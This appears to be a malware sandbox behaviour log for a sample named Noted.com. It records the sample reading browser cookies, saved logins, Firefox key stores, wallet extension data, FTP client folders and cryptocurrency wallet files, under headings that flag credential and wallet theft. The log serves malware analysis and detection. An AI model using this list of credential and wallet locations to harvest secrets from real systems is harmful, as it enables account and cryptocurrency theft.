      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Tries to harvest and steal ftp login credentials
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Tries to steal Crypto Currency Wallets
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\LIJDSFKJZGJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\GLTYDMDUSTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
